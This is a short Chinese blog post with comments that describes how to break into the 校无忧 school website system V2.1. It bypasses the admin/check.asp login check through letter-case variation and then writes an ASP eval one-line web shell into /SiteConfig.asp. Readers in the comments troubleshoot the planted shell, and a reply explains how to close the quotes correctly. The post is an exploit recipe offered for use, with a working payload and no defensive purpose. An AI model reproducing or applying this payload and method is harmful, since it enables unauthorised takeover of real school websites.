校无忧系统 漏洞

#####################################################################
by Roker
以 校无忧学校网站系统 V 2.1 为例到 admin/check.asp 文件看了下。。

这尼玛在逗我。。?

大小写绕过,

拿shell:
/SiteConfig.asp 处
“%><%eval(request("r"))%>
写入一句话。
他的 评选投票系统也是如此。

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 4 Responses to “校无忧系统 漏洞”
    • 全球小破孩

      :cry: 为什么插完马是500错误

      • 是不是搞错了额啊,某些时候500也是可以连接点吧~

        • 您好 小弟刚开始学习SQL注入 本想用无忧学校系统练手 绕过过滤后 到UPDATE时 还是不成功 想试试您的方法 可是有些不明白 还望指导

          卢克
          • update数据库么?这个就是往配置文件里面插马,注意前后的闭合。不然会报错 的,记得修改回来,不然整个网站就废掉了。